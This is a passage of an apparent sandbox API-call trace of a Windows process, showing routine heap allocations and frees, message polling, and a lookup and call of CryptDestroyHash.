hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0156.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a10 | out: hHeap=0x970000) returned 1 [0156.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0156.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0156.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0156.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0156.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0156.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0156.546] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a28 | out: hHeap=0x970000) returned 1 [0156.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0156.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0156.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ec0 [0156.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0156.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0156.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0156.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0156.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0156.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0156.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0156.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0156.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0156.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0156.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0156.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0156.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f50 [0156.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0156.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0156.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0156.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0156.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f50 | out: hHeap=0x970000) returned 1 [0156.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0156.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0156.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0156.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0156.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0156.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0156.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0156.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0156.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0156.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0156.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0156.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0156.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0156.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0156.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0156.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0156.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0156.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0156.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0156.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0156.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0156.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0156.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0156.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0156.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0156.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0156.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0156.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0156.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0156.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0156.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0156.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0156.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0156.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0156.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0156.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0156.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0156.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0156.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0156.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0156.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0156.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0156.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0156.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0156.549] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0156.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0156.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0156.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0156.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0156.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0156.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0156.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0156.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0156.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0156.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0156.550] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0156.550] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0156.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0156.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0156.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0156.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0156.550] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0156.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0156.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0156.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0156.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0156.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0156.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0156.550] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0156.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0156.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0156.550] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0156.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0156.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0156.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0156.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0156.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0156.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0156.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0156.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50920 [0156.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0156.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507b8 [0156.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0156.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0156.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0156.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0156.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50758 [0156.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50980 [0156.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50878 [0156.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0156.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0156.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0156.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0156.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50998 [0156.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0156.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0156.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0156.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0156.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ae8 [0156.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50a40 [0156.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0156.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50c50 [0156.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50a88 [0156.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0156.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0156.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0156.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff48 [0156.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0156.552] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0156.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff48 | out: hHeap=0x970000) returned 1 [0156.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0156.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b78 [0156.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0156.552] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0156.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0156.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0156.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0156.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0156.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0156.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0156.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0156.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0156.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0156.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0156.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0156.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0156.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0156.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0156.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0156.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0156.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0156.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0156.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0156.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0156.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0156.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0156.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0156.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0156.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0156.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0156.553] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0156.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0156.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0156.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0156.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0156.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0156.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0156.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0156.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0156.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0156.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0156.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0156.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0156.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0156.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0156.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0156.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0156.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0156.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0156.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0156.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0156.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0156.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e699e8 [0156.554] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e699e8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0156.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0156.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0156.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0156.555] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0156.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0156.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0156.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0156.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0156.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0156.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0156.555] CryptDestroyHash (hHash=0xa87250) returned 1 [0156.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0156.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0156.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0156.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0156.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0156.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0156.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0156.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0156.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0156.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0156.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0156.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0156.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0156.556] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0156.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0156.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0156.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0156.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0156.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0156.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0156.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0156.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0156.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0156.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0156.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0156.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0156.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0156.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0156.556] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0156.557] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 